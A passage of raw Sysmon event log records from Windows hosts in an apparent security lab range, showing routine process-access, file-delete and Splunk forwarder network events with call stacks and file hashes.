l.dll+51821 10341000x80000000000000005917817Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:08.727{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638593Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:08.366{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1028A14605BFE8C3DBB41106BC913674,SHA256=8E0DCB0AAFCFD48ED8173979364761EBC8BA61BEEADFFE3EF0DC9D084E238501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638596Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:09.538{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA6F66BBC05FC3CC61EFD3008B60EA79,SHA256=204A35A9D01C76A8E4B3828222B0E3BE23223091209591B322926D5EC1DCC7CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917825Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:09.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917824Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:09.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917823Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:09.440{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917822Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:09.440{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000638595Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:04.584{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57257-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000638597Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:10.647{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B7DE0429393BBCF1D49BF24ACC1FAAE,SHA256=B58F11EADD33AE8B694569C54C14D39959181E0533CEC0A5284C0C0A4A597174,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917830Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917829Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917828Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.618{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917827Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.617{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917826Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.150{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E6890268BB2A660F0F8760CD9374D59,SHA256=40469AE571DCD8D132BEF12EF9E5F2702EA0959E8725F66F4A2CEBD4BA8B01B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638600Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:11.663{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7761827BA67E5AAFB4EAE7F80B91F54A,SHA256=06C4D8CEBA9F82110B85F3A2EDDA866CED4989FC24D619E39C5135B8C406AA50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917836Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:11.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917835Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:11.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917834Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:11.444{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B5C0-6058-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005917833Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:11.327{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917832Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:11.327{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917831Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:11.196{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7895C553607949EFD0775D85E0789234,SHA256=B3AF196D71A4AE2D0515FD0B886975082AA188ADBEF0D17DD9DDBB1CC54AE407,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638599Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:07.381{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57258-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638598Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:11.100{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B59C1D2EB4F2E44AB7B218ECA9ACF01,SHA256=4C7F7518F4E2D4A5A87BC89068D1EF15A7FDCDF97FBECA611183043DF0BD8659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638601Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:12.757{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9E736A91B69A7DCFB2E754FE9AABE80,SHA256=617461B09427BC8716783BD9A6BDB00259F22730EFFD10B7584EAC66DF3148F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917841Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:12.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917840Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:12.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917839Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:12.202{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB42C282B8C1C5560F3B594EB833A10A,SHA256=D0FDF69A388DB4DDD8D4B5CCBE7A33FE64D52CCDB75EE5C17D2186952D7F7648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917838Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:12.079{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64FD522E3465AC04C5E5997ADBE21CA4,SHA256=1781299FCEF46F7B5DF4941F4A12E30F206B8777C80C32529B10794F052D7F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917837Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:12.078{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BD3CE248DEF8FD839C0AEA14575682E,SHA256=EA2E15CD750FF64D50D6B3495DE68C9D90381B491F15B038B13542E25133D9E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638602Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:13.819{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D54AD60287F24BD7243C3A9B1F1AC7,SHA256=D7CAC0E5C217616BD11D66FE8D3FABF0A4B81685F523C751FA205E2D6AF32ECB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917853Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:13.895{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917852Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:13.895{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917851Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:13.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917850Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 